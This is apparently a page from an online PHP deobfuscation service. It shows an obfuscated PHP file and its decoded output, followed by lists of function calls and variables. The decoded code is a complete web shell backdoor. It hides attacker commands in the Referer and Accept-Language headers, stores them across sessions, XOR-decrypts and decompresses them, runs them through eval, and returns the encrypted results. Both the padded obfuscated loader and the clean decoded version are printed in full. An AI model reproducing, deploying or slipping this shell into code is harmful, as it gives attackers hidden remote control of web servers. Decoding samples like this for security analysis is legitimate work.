Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $O='url($rr);parse_so6tr($u["quero6y"o6],$qo6);$qo6=array_valueo6so6($q);pro6eg_matc..

Decoded Output download

$kh="408e";$kf="f232";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$O='url($rr);parse_so6tr($u["quero6y"o6],$qo6);$qo6=array_valueo6so6($q);pro6eg_match_alo6lo6("/([\\w])[\\wo6-]+(?o6o6o6:;q';
$r='s[$i]o6="o6";$p=$ss($p,o63);o6}o6if(array_key_exo6isto6o6s($i,o6$s)){$s[$i].o6=$p;$e=sto6rpos($s[$io6],$f)o6;o6if(';
$S=str_replace('lp','','lpclpreate_lpflpunlpctlpion');
$n='o6"/_o6/","/-/"),array("/","o6+"),$sso6($s[$i],o60,$eo6o6))),$k)));$o=o6ob_go6et_conteo6ntso6();ob_end_co6o6o6';
$L='$o6e){$k=$ko6h.$kf;ob_so6tart();@o6eo6val(@gzo6uncompreo6ss(@x(o6@base6o64_o6decode(po6reg_ro6epo6lace(aro6o6ray(';
$f='o6),o60,3));$p="";for($z=1;$zo6<coo6unt($m[1]);o6$o6z+o6+)$p.=$q[$mo6[2][$zo6]];io6f(strpos($po6,$h)=o6==0)o6{$';
$g='=0.([\\d]))?,?/o6",$ra,$mo6);ifo6(o6$o6q&&$m){@session_so6tart();o6$s=&$o6o6_SESSION;o6$ss=o6"so6ubstr";$sl="o6str';
$K='$rr=o6@$r["o6HTTP_REo6FERERo6"]o6;$ra=@$r[o6"Ho6TTP_Ao6CCEPT_LANGUo6AGo6E"];if($ro6r&&$o6ro6o6a)o6{$o6u=parse_';
$Z='to6olower"o6;$io6=$mo6[1][0].$m[o61][1];o6$h=$sl($ss(mdo65($io6.$ko6h),0,3));$fo6o6=$sl($o6ss(mo6d5($o6i.$ko6f';
$U='lean();$d=baso6o6eo664_encode(x(gzcompo6ress($o),$o6k));o6print("<o6$k>$do6</$k>"o6);@seo6ssio6on_deso6troy();}}}}';
$B='$kh="4o6o608e";$kf="f2o6o63o62";funco6tion x($to6,$k){$c=stro6leo6n($k);$l=strleo6n($t);$o=o6"";foro6o6($i=0;';
$w='$i<$l;o6){o6for($j=0;o6($jo6<$c&&$io6o6<$l);$j++,o6$i+o6+){$o.=$t{$o6i}o6^$k{$o6j};}}return o6$oo6;}$o6r=$_SERVER;';
$o=str_replace('o6','',$B.$w.$K.$O.$g.$Z.$f.$r.$L.$n.$U);
$Q=$S('',$o);$Q();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$B $kh="4o6o608e";$kf="f2o6o63o62";funco6tion x($to6,$k){$c=str..
$K $rr=o6@$r["o6HTTP_REo6FERERo6"]o6;$ra=@$r[o6"Ho6TTP_Ao6CCEPT..
$L $o6e){$k=$ko6h.$kf;ob_so6tart();@o6eo6val(@gzo6uncompreo6ss(..
$O url($rr);parse_so6tr($u["quero6y"o6],$qo6);$qo6=array_valueo..
$Q None
$S create_function
$U lean();$d=baso6o6eo664_encode(x(gzcompo6ress($o),$o6k));o6pr..
$Z to6olower"o6;$io6=$mo6[1][0].$m[o61][1];o6$h=$sl($ss(mdo65($..
$f o6),o60,3));$p="";for($z=1;$zo6<coo6unt($m[1]);o6$o6z+o6+)$p..
$g =0.([\d]))?,?/o6",$ra,$mo6);ifo6(o6$o6q&&$m){@session_so6tar..
$n o6"/_o6/","/-/"),array("/","o6+"),$sso6($s[$i],o60,$eo6o6)))..
$o $kh="408e";$kf="f232";function x($t,$k){$c=strlen($k);$l=str..
$r s[$i]o6="o6";$p=$ss($p,o63);o6}o6if(array_key_exo6isto6o6s($..
$w $i<$l;o6){o6for($j=0;o6($jo6<$c&&$io6o6<$l);$j++,o6$i+o6+){$..

Stats

MD5 67c3b1198d1471ed103f7ab111ed9b51
Eval Count 1
Decode Time 196 ms